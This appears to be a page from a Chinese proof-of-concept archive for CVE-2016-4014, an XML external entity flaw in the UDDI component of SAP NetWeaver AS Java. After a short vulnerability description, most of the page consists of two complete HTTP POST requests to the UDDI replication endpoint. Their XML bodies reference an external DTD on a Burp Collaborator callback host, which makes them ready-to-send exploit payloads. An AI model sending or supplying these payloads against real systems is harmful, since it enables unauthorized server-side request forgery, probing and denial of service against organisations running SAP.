关联漏洞
标题:
SAP NetWeaver AS JAVA UDDI组件XML外部实体漏洞
(CVE-2016-4014)
描述:SAP NetWeaver是德国思爱普(SAP)公司的一套面向服务的集成化应用平台,该平台可为SAP应用提供开发和运行环境。SAP NetWeaver AS(Application Server)Java是一款运行于NetWeaver中且基于Java编程语言的应用服务器。UDDI是其中的一个对Web services进行注册和搜索的目录服务组件。 SAP NetWeaver AS JAVA 7.4版本的UDDI组件中存在XML外部实体漏洞。远程攻击者可通过发送特制的XML请求利用该漏洞造成拒绝服务。
描述
[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)
介绍
<b>[CVE-2016-4014] SAP Netweaver JAVA AS UDDI Component XXE</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
```
POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://xyzabcdefhjkl.burpcollaborator.net/ssrf">
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header />
<SOAP-ENV:Body>
<do_ping>
<authInfo />
<findQualifiers>
<findQualifier>FINDQUALIFIER</findQualifier>
</findQualifiers>
<tModelBag>
<tModelKey>asd</tModelKey>
</tModelBag>
</do_ping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
```
POST /uddi/api/replication HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://xyzabcdefhjkl.burpcollaborator.net/">
%external;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header />
<SOAP-ENV:Body>
<do_ping>
<authInfo />
<findQualifiers>
<findQualifier>FINDQUALIFIER</findQualifier>
</findQualifiers>
<tModelBag>
<tModelKey>asd</tModelKey>
</tModelBag>
</do_ping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
文件快照
[4.0K] /data/pocs/a93785df4caa239ffc47e0dac17b4f584f00e424
└── [1.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。